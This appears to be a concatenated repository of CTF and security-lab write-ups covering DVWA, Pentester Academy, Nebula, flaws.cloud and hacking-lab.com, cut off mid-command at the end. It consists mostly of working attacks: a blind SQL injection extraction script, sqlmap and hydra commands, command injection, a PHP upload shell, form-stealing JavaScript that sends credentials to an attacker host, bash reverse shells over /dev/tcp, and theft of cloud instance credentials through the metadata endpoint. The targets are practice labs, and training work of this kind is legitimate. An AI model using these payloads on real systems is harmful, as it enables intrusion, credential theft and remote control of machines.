EOF 96 | """ 97 | example output of @@version: 5.7.16-0ubuntu0.16.04.1 98 | 99 | first find length of the @@version string: 100 | 1' and length(@@version)=7# 101 | 102 | iterate thru printable ASCII and retreive @@version string 103 | 1' and ascii(substring(@@version,1,1))=0x35# 104 | """ 105 | 106 | import requests 107 | import string 108 | from urllib import quote, unquote 109 | 110 | proxies = { 111 | "http" : "http://127.0.0.1:8080/" 112 | } 113 | 114 | # initiate HTTP session 115 | session = requests.Session() 116 | session.cookies['security'] = 'low' 117 | session.cookies['PHPSESSID'] = 'pjkq87qc7944tu6deo466g32q1' 118 | 119 | u = 'http://192.168.56.101/DVWA/vulnerabilities/sqli_blind/index.php?id=' 120 | 121 | # find length of @@version string 122 | for i in xrange(1, 30): 123 | payload = "1' and length(@@version)=" + str(i) + "#" 124 | resp = session.get(u + quote(payload) + "&Submit=Submit", proxies=proxies) 125 | 126 | print "{0}: {1}".format(i, resp.status_code) 127 | if resp.status_code == 200: 128 | len = i 129 | break 130 | 131 | version="" 132 | 133 | # retreive @@version string 134 | for i in xrange(1, len + 1): 135 | for c in string.printable: 136 | payload = "1' and ascii(substring(@@version,{0},1))={1}#".format(i, hex(ord(c))) 137 | resp = session.get(u + quote(payload) + "&Submit=Submit", proxies=proxies) 138 | 139 | if resp.status_code == 200: 140 | print payload 141 | version += c 142 | 143 | print version 144 | EOF 145 | ``` 146 | 147 | Trigger: 148 | 149 | $ python py.py 150 | 151 | #### Automated exploitation 152 | 153 | # detect (blind) SQLi 154 | $ sqlmap.py --batch --cookie="PHPSESSID=${PHPSESSID};security=low" --technique=B -u "http://192.168.56.101/DVWA/vulnerabilities/sqli_blind/index.php?id=3&Submit=Submit" -p "id" -t ./sqlmap.log 155 | 156 | # exploitation (retreiving DBMS version) 157 | $ sqlmap.py --batch --cookie="PHPSESSID=${PHPSESSID};security=low" --technique=B -u "http://192.168.56.101/DVWA/vulnerabilities/sqli_blind/index.php?id=3&Submit=Submit" -p "id" -t ./sqlmap.log --sql-query="SELECT version(); 158 | 159 | ### XSS (DOM) 160 | 161 | Payload that ilustrates vulnerability: 162 | 163 | English 164 | 165 | ### XSS (Reflected) 166 | 167 | Trigger vulnerability (via browser): 168 | 169 | http://192.168.56.101/DVWA/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E# 170 | 171 | ### XSS (Stored) 172 | 173 | Inject payload: 174 | 175 | $ curl -s -x 127.0.0.1:8080 -b "PHPSESSID=${PHPSESSID};security=low" "http://192.168.56.101/DVWA/vulnerabilities/xss_s/" --data "txtName=xxx&mtxMessage=$(rawurlencode "")&btnSign=Sign+Guestbook" 176 | 177 | ### Bonus 1 178 | 179 | Session fixation - PHPSESSID is not regenerated after logging in 180 | -------------------------------------------------------------------------------- /DVWA/dvwa-medium.md: -------------------------------------------------------------------------------- 1 | 2 | ### Target 3 | 4 | https://github.com/ethicalhack3r/DVWA 5 | 6 | Security level: medium 7 | 8 | ### Prereq 9 | 10 | # get user token 11 | $ TOKEN=$(curl -c dvwa.session -s http://192.168.56.101/DVWA/login.php | grep 'user_token' | awk -F 'value=' '{print $2}' | cut -d"'" -f2) 12 | 13 | # get session id 14 | $ PHPSESSID=$(grep PHPSESSID dvwa.session | awk -F' ' '{print $7}') 15 | 16 | # log in 17 | $ curl -L -b "PHPSESSID=${PHPSESSID};security=medium" -v -d "username=admin&password=password&Login=Login&user_token=${TOKEN}" http://192.168.56.101/DVWA/login.php 18 | 19 | ### Brute Force 20 | 21 | $ wget https://raw.githubusercontent.com/seifreed/dirb/master/wordlists/others/best110.txt 22 | 23 | $ hydra -t 8 -l admin -P best110.txt -vV 192.168.56.101 http-get-form "/DVWA/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:F=password incorrect:H=Cookie: PHPSESSID=${PHPSESSID};security=medium" 24 | 25 | ### Command Injection 26 | 27 | ``` 28 | # '\n' as a bash commands separtor 29 | $ curl -s -b "PHPSESSID=${PHPSESSID};security=medium" -d 'ip=%0auname+-a&Submit=Submit' http://192.168.56.101/DVWA/vulnerabilities/exec/index.php | grep Linux 30 | 31 | OR 32 | 33 | # '&' as a bash commands separtor 34 | $ curl -s -b "PHPSESSID=${PHPSESSID};security=medium" -d 'ip=%26uname+-a&Submit=Submit' http://192.168.56.101/DVWA/vulnerabilities/exec/index.php | grep Linux 35 | ``` 36 | 37 | ### File Upload 38 | 39 | **Vuln:** insufficient file type validation - looking only at filetype controlled by the user ($_FILES['userfile']['type']) 40 | 41 | **Exploitation** 42 | 43 | ``` 44 | cat > b.php < 46 | EOF 47 | 48 | curl -x 127.0.0.1:8080 -L -b "PHPSESSID=${PHPSESSID};security=medium" -F "MAX_FILE_SIZE=100000" -F "uploaded=@b.php;type=image/jpeg;filename=b.php" -F "Upload=Upload" http://192.168.56.101/DVWA/vulnerabilities/upload/index.php 49 | 50 | curl -s -b "PHPSESSID=${PHPSESSID};security=medium" http://192.168.56.101/DVWA/hackable/uploads/b.php 51 | ``` 52 | 53 | ### File Inclusion 54 | 55 | **Vuln:** insufficient input validation 56 | 57 | **Exploitation** 58 | 59 | ``` 60 | # LFI: 61 | $ curl -L -b "PHPSESSID=${PHPSESSID};security=medium" -v http://192.168.56.101/DVWA/vulnerabilities/fi/?page=..././..././hackable/flags/fi.php 62 | 63 | # RFI payload example: 64 | hTTp:// 65 | ``` 66 | 67 | ### Sql Injection 68 | 69 | **Vuln:** incorrect use of mysqli_real_escape_string function: now quotes are used so input is treated as integer 70 | 71 | Payload to retreive users password fields: 72 | 73 | ``` 74 | 1 union select Password, User from users# 75 | ``` 76 | 77 | **Exploitation** 78 | 79 | ``` 80 | $ curl -s -x 127.0.0.1:8080 -b "PHPSESSID=${PHPSESSID};security=medium" "http://192.168.56.102/DVWA/vulnerabilities/sqli/index.php" -d 'id=1+union+select+Password%2CUser+FROM+users%23&Submit=Submit' 81 | ``` 82 | 83 | ### Sql Injection (Blind) 84 | 85 | **Vulnerability** 86 | 87 | Payloads: 88 | 89 | ``` 90 | true condtion: 1 and 1=1# 91 | false condition: 1 and 1=0# 92 | ``` 93 | 94 | **Exploitation** 95 | 96 | Manual: 97 | 98 | ``` 99 | # dependency: 100 | https://stackoverflow.com/questions/296536/how-to-urlencode-data-for-curl-command 101 | 102 | # true condition: 103 | curl -s -x 127.0.0.1:8080 -b "PHPSESSID=${PHPSESSID};security=medium" "http://192.168.56.102/DVWA/vulnerabilities/sqli_blind/index.php" -d "id=$(rawurlencode "1 and 1=1#")&Submit=Submit" 104 | 105 | # false condition: 106 | curl -s -x 127.0.0.1:8080 -b "PHPSESSID=${PHPSESSID};security=medium" "http://192.168.56.102/DVWA/vulnerabilities/sqli_blind/index.php" -d "id=$(rawurlencode "1 and 1=0#")&Submit=Submit" 107 | ``` 108 | 109 | Retreiving DBMS version PoC: 110 | 111 | ``` 112 | cat > poc.py < 176 | ``` 177 | 178 | ### XSS (Reflected) 179 | 180 | http://192.168.56.102/DVWA/vulnerabilities/xss_r/?name=%3C/pre%3E%3CScRiPt%3Ealert(1)%3C%2Fscript%3E%3Cpre%3E# 181 | 182 | ### XSS (DOM) 183 | 184 | Payload that ilustrates vulnerability (this time filtering is done on server side so we use anchor '#' to prevent it from sending to the server: 185 | 186 | English# 187 | 188 | Or do not use 'script' tags: 189 | 190 | English

191 | 192 | ## XSS (Stored) 193 | 194 | Payload for `txtName` field: `` 195 | -------------------------------------------------------------------------------- /PentesterAcademy/js-for-pentesters.md: -------------------------------------------------------------------------------- 1 | 2 | ### Target 3 | 4 | https://www.pentesteracademy.com/course?id=11 5 | 6 | ### Prereq 7 | 8 | Include this in your `.bashrc`: 9 | 10 | https://stackoverflow.com/questions/296536/how-to-urlencode-data-for-curl-command/10660730#10660730 11 | 12 | ### Task 1 13 | 14 | https://pentesteracademylab.appspot.com/lab/webapp/jfp/1 15 | 16 | **Solution** 17 | 18 | ``` 19 | https://pentesteracademylab.appspot.com/lab/webapp/jfp/1?url= 20 | 21 | Payloads generation: 22 | $ rawurlencode '' 23 | $ rawurlencode '' 24 | ``` 25 | 26 | ### Task 2 27 | 28 | https://pentesteracademylab.appspot.com/lab/webapp/jfp/2 29 | 30 | **Solution** 31 | 32 | ``` 33 | https://pentesteracademylab.appspot.com/lab/webapp/jfp/2?url= 34 | 35 | Payload generation: 36 | $ rawurlencode '' 37 | ``` 38 | 39 | ### Task 3 40 | 41 | https://pentesteracademylab.appspot.com/lab/webapp/jfp/3 42 | 43 | **Solution** 44 | 45 | https://pentesteracademylab.appspot.com/lab/webapp/jfp/3?email=abc@xyz.com&password=111&url= 46 | 47 | Preparing the payload (adding rouge `` tag): 48 | 49 | ``` 50 | $ cat > JSforPentesters-3.js <<'EOF' 51 | function intercept() { 52 | new Image().src = "https://attacker-controlled.machine/3?email=" + document.forms[0].elements[0].value + "&password=" + document.forms[0].elements[1].value; 53 | return false; 54 | } 55 | document.forms[0].onsubmit = intercept; 56 | EOF 57 | 58 | $ rawurlencode "" 59 | ``` 60 | 61 | Alternative payload (triggering `xhr` request - request will cause CORS abuse in browser but it will be sent, only the response will be blocked but the browser): 62 | 63 | ``` 64 | $ cat > JSforPentesters-3-2.js <<'EOF' 65 | function intercept() { 66 | var xhr = new XMLHttpRequest(); 67 | xhr.open("GET", "https://attacker-controlled.machine/3?email=" + document.forms[0].elements[0].value + "&password=" + document.forms[0].elements[1].value); 68 | xhr.send(); 69 | return false; 70 | } 71 | document.forms[0].onsubmit = intercept; 72 | EOF 73 | 74 | $ rawurlencode "" 75 | ``` 76 | 77 | ### Task 4 78 | 79 | https://pentesteracademylab.appspot.com/lab/webapp/jfp/4 80 | 81 | **Solution** 82 | 83 | https://pentesteracademylab.appspot.com/lab/webapp/jfp/4?email=abc@xyz.com&password=111&url= 84 | 85 | Payload generation: 86 | 87 | ``` 88 | $ cat > JSforPentesters-4.js <<'EOF' 89 | pin = document.createElement("input"); 90 | pin.setAttribute("type", "text"); 91 | pin.setAttribute("value", ""); 92 | pin.setAttribute("class", "input-block-level"); 93 | pin.setAttribute("placeholder", "ATM Pin"); 94 | pin.setAttribute("name", "pin"); 95 | document.forms[0].insertBefore(pin, document.forms[0].elements[1]); 96 | EOF 97 | 98 | $ rawurlencode "" 99 | ``` 100 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## CTF-Writeups 2 | 3 | My writeups of various CTFs, security challenges and vulnerability testbeds. 4 | 5 | ### Burp Academy 6 | 7 | [Burp Academy Labs (all)](Burp-Academy/burp-academy.md) 8 | 9 | [SQL injection (SQLi)](Burp-Academy/burp-academy.md#sql-injection) 10 | 11 | [XSS](Burp-Academy/burp-academy.md#xss) 12 | 13 | [OAuth authentication](Burp-Academy/burp-academy.md#oauth-authentication) 14 | 15 | [XML external entity (XXE) injection](Burp-Academy/burp-academy.md#xml-external-entity-xxe-injection) 16 | 17 | [Cross-site request forgery (CSRF)](Burp-Academy/burp-academy.md#cross-site-request-forgery-csrf) 18 | 19 | [Access control vulnerabilities](Burp-Academy/burp-academy.md#access-control-vulnerabilities) 20 | 21 | [HTTP Host header attacks](Burp-Academy/burp-academy.md#http-host-header-attacks) 22 | 23 | [SSRF](Burp-Academy/burp-academy.md#ssrf) 24 | 25 | [CORS](Burp-Academy/burp-academy.md#cors) 26 | 27 | [OS command injection](Burp-Academy/burp-academy.md#os-command-injection) 28 | 29 | [Directory traversal](Burp-Academy/burp-academy.md#directory-traversal) 30 | 31 | [Insecure deserialization](Burp-Academy/burp-academy.md#insecure-deserialization) 32 | 33 | [File upload vulnerabilities](Burp-Academy/burp-academy.md#file-upload-vulnerabilities) 34 | 35 | [Business logic vulnerabilities](Burp-Academy/burp-academy.md#business-logic-vulnerabilities) 36 | 37 | [WebSockets](Burp-Academy/burp-academy.md#websockets) 38 | 39 | [Clickjacking](Burp-Academy/burp-academy.md#clickjacking) 40 | 41 | [JWT](Burp-Academy/burp-academy.md#jwt) 42 | 43 | ### Pentester Academy 44 | 45 | [JS for Pentesters](PentesterAcademy/js-for-pentesters.md) 46 | 47 | ### wechall.net 48 | 49 | [wechall](wechall.net/wechall.md) 50 | 51 | [natas](wechall.net/natas.md) (overthewire.org) 52 | 53 | ### ropemporium.com 54 | 55 | [32bit binaries](ropemporium.com/ropemporium32.md) 56 | 57 | [64bit binaries](ropemporium.com/ropemporium64.md) 58 | 59 | ### flaws.cloud 60 | 61 | [flaws.cloud](flaws.cloud/flaws.cloud.md) 62 | 63 | ### hacking-lab.com 64 | 65 | [Webgoat](hacking-lab.com/webgoat/README.md) 66 | 67 | [Top 10](hacking-lab.com/top10.md) 68 | 69 | ### rozwal.to 70 | 71 | [my profile](https://stary.rozwal.to/profile/mzet) 72 | 73 | ### ctf.infosecinstitute.com 74 | 75 | [ctf.infosecinstitute.com](ctf.infosecinstitute.com/README.md) 76 | 77 | ### DVWA (Damn Vulnerable Web Application) 78 | 79 | [DVWA: low](DVWA/dvwa-low.md) 80 | 81 | [DVWA: medium](DVWA/dvwa-medium.md) 82 | 83 | [DVWA: hard](DVWA/dvwa-hard.md) 84 | 85 | ### exploit-exercises.com 86 | 87 | [Nebula](exploit-exercises.com/nebula.md) 88 | 89 | ### 0CTF 2016 Quals 90 | 91 | [Monkey](0CTF%202016%20Quals/monkey.md) 92 | -------------------------------------------------------------------------------- /ctf.infosecinstitute.com/README.md: -------------------------------------------------------------------------------- 1 | 2 | ## Level 1 3 | 4 | ``` 5 | $ curl -s http://ctf.infosecinstitute.com/levelone.php | grep flag 6 | ``` 7 | 8 | flag: `infosec_flagis_welcome` 9 | 10 | ## Level 2 11 | 12 | ``` 13 | $ curl -s http://ctf.infosecinstitute.com/leveltwo.php | grep img 14 | $ curl -s http://ctf.infosecinstitute.com/img/leveltwo.jpeg | openssl base64 -d 15 | ``` 16 | 17 | flag: `infosec_flagis_wearejuststarting` 18 | 19 | ## Level 3 20 | 21 | Dependencies: 22 | zbar-tools 23 | bsdgames 24 | 25 | ``` 26 | $ curl -s http://ctf.infosecinstitute.com/levelthree.php | grep img 27 | $ wget http://ctf.infosecinstitute.com/img/qrcode.png 28 | $ zbarimg -q --raw qrcode.png | morse -ds 29 | ``` 30 | 31 | flag: `INFOSECFLAGISMORSING` 32 | 33 | ## Level 4 34 | 35 | ``` 36 | $ alias rot13="tr '[A-Za-z]' '[N-ZA-Mn-za-m]'"; curl -vvv http://ctf.infosecinstitute.com/levelfour.php 2>&1 | grep Set-Cookie | awk '{print $3}' | rot13 37 | ``` 38 | 39 | flag: `infosec_flagis_welovecookies` 40 | 41 | ## Level 5 42 | 43 | Dependencies: 44 | steghide 45 | 46 | ``` 47 | $ curl -s http://ctf.infosecinstitute.com/levelfive.php | grep img 48 | $ wget http://ctf.infosecinstitute.com/img/aliens.jpg 49 | $ steghide --extract -q -p '' -sf aliens.jpg -xf - | python3 -c "import binascii; x=int(input(),2); print(binascii.unhexlify('%x' % x))" 50 | ``` 51 | 52 | flag: `infosec_flagis_stegaliens` 53 | 54 | ## Level 6 55 | 56 | ``` 57 | $ wget http://ctf.infosecinstitute.com/misc/sharkfin.pcap 58 | $ strings sharkfin.pcap | head -1 | xxd -p -r 59 | ``` 60 | 61 | flag: `infosec_flagis_sniffed` 62 | 63 | ## Level 7 64 | 65 | ``` 66 | $ curl -s -v http://ctf.infosecinstitute.com/levelseven.php 2>&1 | grep 200 | awk '{print $4}' | openssl base64 -d 67 | ``` 68 | 69 | flag: `infosec_flagis_youfoundit` 70 | 71 | ## Level 8 72 | 73 | ``` 74 | $ wget http://ctf.infosecinstitute.com/misc/app.exe 75 | $ strings app.exe | grep flag 76 | ``` 77 | 78 | flag: `infosec_flagis_0x1a` 79 | 80 | ## Level 9 81 | 82 | ``` 83 | $ lynx -dump -listonly http://www.google.com/search?q='Cisco IDS default password' | grep cisco | head -1 | awk '{print $2}' | lynx -dump - | grep 'default password' 84 | $ curl -s --data 'username=root&password=attack' http://ctf.infosecinstitute.com/levelnine.php | grep alert | grep -o "'.*'" | sed "s/'//g" | rev 85 | ``` 86 | 87 | ## Level 10 88 | 89 | Dependencies: 90 | audacity 91 | 92 | ``` 93 | $ wget http://ctf.infosecinstitute.com/misc/Flag.wav 94 | $ audacity Flag.wav 95 | (audacity GUI) Adjust 'Playback speed' to hear recognizable audio 96 | ``` 97 | 98 | flag: `infosec_flagis_found` 99 | 100 | ## Level 11 101 | 102 | ``` 103 | $ curl -s http://ctf.infosecinstitute.com/leveleleven.php | grep img 104 | $ wget http://ctf.infosecinstitute.com/img/php-logo-virus.jpg 105 | $ strings php-logo-virus.jpg | head -3 | tail -1 | awk -F'_' '{print $3}' | base64 -d 106 | ``` 107 | 108 | flag: `infosec_flagis_powerslide` 109 | 110 | ## Level 12 111 | 112 | ``` 113 | $ diff -u <(curl -s http://ctf.infosecinstitute.com/leveleleven.php) <(curl -s http://ctf.infosecinstitute.com/leveltwelve.php) | grep design | grep -o '".*"' | awk '{print $1}' | sed 's/"//g' 114 | $ curl -s 'http://ctf.infosecinstitute.com/css/design.css' | grep color | awk '{print $2}' | xxd -r -p 115 | ``` 116 | 117 | flag: `infosec_flagis_heyimnotacolor` 118 | 119 | ## Level 13 120 | 121 | ``` 122 | $ curl -s ctf.infosecinstitute.com/levelthirteen.php.old 123 | $ wget ctf.infosecinstitute.com/misc/imadecoy 124 | $ wireshark imadecoy (GUI -> File -> Export Objects -> HTTP -> HoneyPY.PNG) 125 | $ ristretto HoneyPY.PNG 126 | ``` 127 | 128 | flag: `infosec_flagis_morepackets` 129 | 130 | ## Level 14 131 | 132 | ``` 133 | $ curl -s http://ctf.infosecinstitute.com/misc/level14 | grep '(104' | tail -1 | awk '{print $2}' | tr -d "',\\\\u00" | xxd -p -r 134 | ``` 135 | 136 | flag: `infosec_flagis_whatsorceryisthis` 137 | 138 | ## Level 15 139 | 140 | ``` 141 | $ curl -s http://ctf.infosecinstitute.com/levelfifteen/.hey 142 | $ firefox http://crypo.in.ua/tools/eng_atom128d.php 143 | ``` 144 | 145 | flag: `infosec_flagis_rceatomized` 146 | -------------------------------------------------------------------------------- /exploit-exercises.com/nebula.md: -------------------------------------------------------------------------------- 1 | 2 | ### Challenge link 3 | 4 | https://exploit-exercises.com/nebula/ 5 | 6 | ### Level 00 7 | 8 | $ find / -perm -4000 -user flag00 2> /dev/null 9 | 10 | ### Level 01 11 | 12 | $ echo -e '#!/bin/bash\n/bin/sh -c getflag' > ./echo; chmod +x ./echo; PATH=./:"$PATH" /home/flag01/flag01 13 | 14 | ### Level 02 15 | 16 | $ USER='`/bin/sh -c getflag`' /home/flag02/flag02 17 | 18 | ### Level 03 19 | 20 | ``` 21 | #!/bin/bash 22 | 23 | echo 'getflag > output2' > /home/flag03/writable.d/mz 24 | echo 'Please wait while cron execute your command ...' 25 | while [ ! -f /home/flag03/output2 ]; do sleep 1; done 26 | cat /home/flag03/output2 27 | ``` 28 | 29 | ### Level 04 30 | 31 | My comments: 32 | 33 | ``` 34 | # this won't work (cause su won't take password from stdin) 35 | # echo `DST=/home/flag04; ln -s $DST/token lnk; $DST/flag04 ./lnk` | su - 36 | 37 | # this also won't work on Ubuntu (why?) 38 | # echo `DST=/home/flag04; ln -s $DST/token lnk; $DST/flag04 ./lnk` | sudo -u flag04 -S -s getflag 39 | 40 | # so to automate it I had to use trick that I've learned from http://vladz.devzero.fr/002_su-stdin.php 41 | ``` 42 | 43 | My solution: 44 | 45 | $ echo -e '#include \n #include \n #include \n main(int argc, char *argv[]) { char c[512]; int i; sprintf(c, "%s\\n", argv[1]); for(i=0; i 65 | #include 66 | #include 67 | 68 | main(int argc, char *argv[]) 69 | { 70 | char c[512]; 71 | int i; 72 | sprintf(c, "%s\n", argv[1]); 73 | for(i=0; i\n #include \n #include \n main(int argc, char *argv[]) { char c[512]; int i; sprintf(c, "%s\\n", argv[1]); for(i=0; i& /dev/tcp// 0>&1 108 | PAYLOAD2=bash%20%2Di%20%3E%26%20/dev/tcp/${REVERSE_IP}/${REVERSE_PORT}%200%3E%261 109 | 110 | if [ -z "$1" ] 111 | then 112 | echo "Usage: `basename $0`

" 113 | exit 1 114 | fi 115 | 116 | (sleep 1; curl http://${IP}:7007/index.cgi?Host=localhost%3B"${PAYLOAD2}") & 117 | nc -l -p 2222 -vvv 118 | ``` 119 | 120 | ### Level08 121 | 122 | ``` 123 | # hex representation of "follow TCP stream" option on first (and only) stream in tshark: 124 | $ tshark -z follow,tcp,hex,0 -r capture.pcap 125 | 126 | # we see interesting string where dots are 0x7f (DELETE in ASCII): 127 | backdoor...00Rm8.ate 128 | 129 | # when we will treat dots as DELETEs (backspaces) we will get the password (we can simulate backspaces with '\b' with echo command): 130 | $ echo -e "backdoor\b\b\b00Rm8\bate" 131 | backd00Rmate 132 | 133 | $ su flag08 134 | ``` 135 | 136 | ### Level10 137 | 138 | classic TOCTOU problem: 139 | 140 | ``` 141 | # listen for "file uploads": 142 | $ while [ 1 ]; do nc -l 18211; done 143 | 144 | # prepare symlink which alternately links to 'fileToWhichIHaveAccess' and to 'token' files: 145 | $ echo 'fileToWhichIHaveAccess' > /home/level10/fileToWhichIHaveAccess 146 | $ while [ 1 ]; do ln -sf /home/level10/fileToWhichIHaveAccess /tmp/lnk; ln -sf /home/flag10/token /tmp/lnk; rm /tmp/lnk; done 147 | 148 | # execute vulnerable binary: 149 | while [ 1 ]; do ./flag10 /tmp/lnk 127.0.0.1; done 150 | ``` 151 | 152 | ### Level12 153 | 154 | **Vuln:** 155 | 156 | Lack of input data validation of popen() parameter: 157 | 158 | ``` 159 | prog = io.popen("echo "..password.." | sha1sum", "r") 160 | ``` 161 | 162 | One can simply inject os command (reverse shell for example): 163 | 164 | ``` 165 | 192.168.8.100$ nc -l -p 2222 166 | victim$ echo "; bash -i >& /dev/tcp/192.168.8.100/2222 0>&1" | nc 127.0.0.1 50001 167 | ``` 168 | -------------------------------------------------------------------------------- /flaws.cloud/flaws.cloud.md: -------------------------------------------------------------------------------- 1 | 2 | ### Level 1: http://flaws.cloud 3 | 4 | **Vulnerability:** bucket's listing access permission set to "Everyone" 5 | 6 | ``` 7 | # determine region 8 | $ host flaws.cloud 9 | $ host 10 | # list bucket content 11 | $ aws s3 ls s3://flaws.cloud/ --no-sign-request --region us-west-2 12 | # get interesting file 13 | $ aws s3 cp s3://flaws.cloud/secret-dd02c7c.html --no-sign-request --region us-west-2 secret-dd02c7c.html 14 | $ cat secret-dd02c7c.html 15 | ``` 16 | 17 | ### Level 2: http://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud 18 | 19 | **Vulnerability:** bucket's listing access permission set to "Any Authenticated AWS User" 20 | 21 | $ aws s3 --profile mzetAccount ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud 22 | $ aws s3 --profile mzetAccount cp s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/secret-e4443fc.html secret-e4443fc.html 23 | 24 | ### Level 3: http://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud 25 | 26 | **Vulnerability:** bucket listing access to 'Everyone' + leaking AWS keys by accidently commiting it to git repo kept in the bucket 27 | 28 | ``` 29 | $ aws s3 ls http://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud --no-sign-request --region us-west-2 30 | # download content of the bucket: 31 | $ aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ . --no-sign-request --region us-west-2 32 | # retreive secret from git history: 33 | $ git log 34 | $ git stash 35 | $ git checkout f7cebc46b471ca9838a0bdd1074bb498a3f84c87 36 | $ cat secret.txt 37 | # create new profile with found AWS keys & list all available buckets for this account: 38 | $ aws configure --profile flaws.cloud 39 | $ aws --profile flaws s3 ls 40 | ``` 41 | 42 | ### Level 4: http://level4-1156739cfb264ced6de514971a4bef68.flaws.cloud 43 | 44 | **Vulnerability:** snapshot of EC2 instance is made accessible to all AWS users (is made 'Public') 45 | 46 | ``` 47 | # identify DNS name of EC2 instance: 48 | $ host 4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud 49 | 50 | # look for snapshot of ec2-35-165-182-7.us-west-2.compute.amazonaws.com machine: 51 | 52 | # first get identity of keys that are used (to filter snapshots only for this user) 53 | $ aws --profile flaws.cloud sts get-caller-identity 54 | # get all snapshots of this (owner-id) user. Note that request is done by other AWS user 55 | $ aws --profile mzetAccount ec2 describe-snapshots --owner-id 975426262029 --region us-west-2 56 | 57 | OR (filter by volume-id): 58 | 59 | $ aws --profile flaws.cloud ec2 describe-instances | grep -i volumeid 60 | # get all snapshots of this volume 61 | $ aws --profile mzetAccount ec2 describe-snapshots --filter "Name=volume-id,Values=vol-04f1c039bc13ea950" --region us-west-2 62 | 63 | # create volume from the snapshot: 64 | $ aws --profile mzetAccount ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89 65 | 66 | # In AWS Console: 67 | # create EC2 instance with second volume (snap-0b49342abd1bdcb89) attached 68 | 69 | # SSH into created instance: 70 | $ ssh -i ".ssh/key.pem" @ 71 | $ sudo mount /dev/xvdb1 /mnt 72 | $ cat /mnt/home/ubuntu/setupNginx.sh 73 | ``` 74 | 75 | ### Level 5: http://level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud/243f422c/ 76 | 77 | **Vulnerability:** exposed proxy which doesn't restrict access to instance's meta-data server and private IP range 78 | 79 | ``` 80 | # attempt to access meta-adata via proxy 81 | $ curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/ 82 | 83 | # access instance's credentials via proxy (flaws is a role with which instanse is associated) 84 | $ curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws 85 | 86 | # use exposed credentials (from the command above) to list level6 bucket: 87 | $ export AWS_SESSION_TOKEN="" 88 | $ AWS_ACCESS_KEY_ID='' AWS_SECRET_ACCESS_KEY='' aws s3 ls --recursive s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud 89 | ``` 90 | 91 | ### Level 6: level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/ddcc78ff/ 92 | 93 | **Vulnerability:** excessive perimssions ('SecurityAudit' policy) are given 94 | 95 | ``` 96 | # confirm your 'level6' identity: 97 | $ aws --profile flaws.cloud3 iam get-user 98 | OR 99 | $ aws --profile flaws.cloud3 sts get-caller-identity 100 | 101 | # run scout2 tool: 102 | $ python Scout2.py --profile flaws.cloud3 103 | 104 | # identify/confirm policies attached to 'level6' user (scout2 output should catch your attention on this): 105 | $ aws --profile flaws.cloud3 iam list-attached-user-policies --user-name Level6 106 | 107 | # get info about 'list_apigateway' policy: 108 | $ aws --profile flaws.cloud3 iam get-policy --policy-arn "arn:aws:iam::975426262029:policy/list_apigateways" 109 | $ aws --profile flaws.cloud3 iam get-policy-version --policy-arn "arn:aws:iam::975426262029:policy/list_apigateways" -- 110 | version-id v4 111 | 112 | # AWS API gateways are commonly used to run AWS Lambda managed code, let's whether that's the case here: 113 | $ aws --region us-west-2 --profile flaws.cloud3 lambda list-functions 114 | $ aws --region us-west-2 --profile flaws.cloud3 lambda get-policy --function-name Level6 115 | $ aws --profile flaws.cloud3 --region us-west-2 apigateway get-stages --rest-api-id "s33ppypa75" 116 | 117 | # finally, using: we can construct Lambda function URL: 118 | https://.execute-api..amazonaws.com// 119 | https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6 120 | 121 | # visiting this URL reveals final link: 122 | http://theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud/d730aa2b/ 123 | ``` 124 | -------------------------------------------------------------------------------- /hacking-lab.com/top10.md: -------------------------------------------------------------------------------- 1 | 2 | ### A1 - SQL Injection Attack 3 | 4 | ``` 5 | ### Vulnerability 6 | 7 | SQLi in `password` field. 8 | 9 | ### Exploitation 10 | 11 | # Get ACookie: 12 | $ RET=`curl -s -i 'http://glocken.hacking-lab.com/12001/inputval_case2/inputval2/controller?action=showpage&page=start' -k | grep 'Set-Cookie' | awk '{print $2}' | tr ';' ' '` 13 | 14 | # Get credit card number: 15 | $ curl -s -b "$RET" -c 'cookies' -L 'https://glocken.hacking-lab.com/12001/inputval_case2/auth_inputval2/login' -k --data 'username=hacker10&action=login&originalURL=https%253A%252F%252Fglocken.hacking-lab.com%252F12001%252Finputval_case2%252Finputval2%252Fcontroller%253Faction%253Dprofile&send=Login' --data-urlencode "password=' or 'a'='a" | grep creditcard 16 | 17 | ### Mitigation 18 | 19 | Validate user input. 20 | ``` 21 | 22 | ### A2 - XSS 23 | 24 | ``` 25 | ### Vulnerability 26 | 27 | As mentioned in the task description, XSS vulnerability exists in the comments site (https://glocken.hacking-lab.com/12001/inputval_case1/inputval1/controller?action=showcomments). 28 | 29 | Vulnerability can be discovered using following steps: 30 | 31 | Step 0: Create authenitcated session for user 'hacker10' (get ACookie & BCookie cookies) - only authenitcated users can add comments: 32 | 33 | $ ACOOKIE=`curl -s -i 'http://glocken.hacking-lab.com/12001/inputval_case1/inputval1/controller?action=showpage&page=start' -k | grep 'ACookie' | awk '{print $2}' | tr ';' ' '` 34 | 35 | $ BCOOKIE=`curl -i -s -b "$ACOOKIE" -c 'cookies' -L 'https://glocken.hacking-lab.com/12001/inputval_case1/auth_inputval1/login' -k --data 'username=hacker10&password=compass&action=login&originalURL=https%253A%252F%252Fglocken.hacking-lab.com%252F12001%252Finputval_case1%252Finputval1%252Fcontroller%253Faction%253Dprofile&send=Login' | grep 'BCookie' | awk '{print $2}' | tr ';' ' '` 36 | 37 | Step 1: Add comment text that contains JavaScript code & verify that sent code is reflected in server's response: 38 | 39 | $ curl -s 